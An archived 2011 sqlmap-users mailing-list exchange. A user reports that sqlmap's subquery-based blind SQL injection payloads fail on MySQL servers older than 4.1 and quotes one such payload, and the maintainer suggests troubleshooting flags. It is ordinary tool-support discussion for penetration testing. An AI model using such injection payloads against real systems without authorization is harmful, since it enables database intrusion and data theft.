Re: [sqlmap-users] Subquery payloads on mysql <4.1
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Subquery payloads on mysql <4.1
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-12 20:53:45
|
Hi Till, Is the injection point only boolean? No UNION? No error-based? Try to increase the value of --level. Can you enumerate the -b? A run with -t traffic.log and inspection of the log file afterwards would be helpful. I reckon I've only detected a SQL injection in MySQL < 4.1 long time ago and as far as I remember it worked with sqlmap, but I might be wrong. Bernardo On 12 July 2011 12:01, Till .ch <ti...@ho...> wrote: > Hi > > > Lately I've been playing with sqlmap and a 4.0 mysql server. Sqlmap detected > the injection point just fine, but struggled with gathering information > about other tables. > I guess this happened due to the fact as subqueries have been introduced > with mysql >=4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html) > and thus payloads like the following are regarded as an invalid query on > mysql <4.1: > > > [PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) > FROM randomtable),1,1)) > 51 > > > Best Regards > Till > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
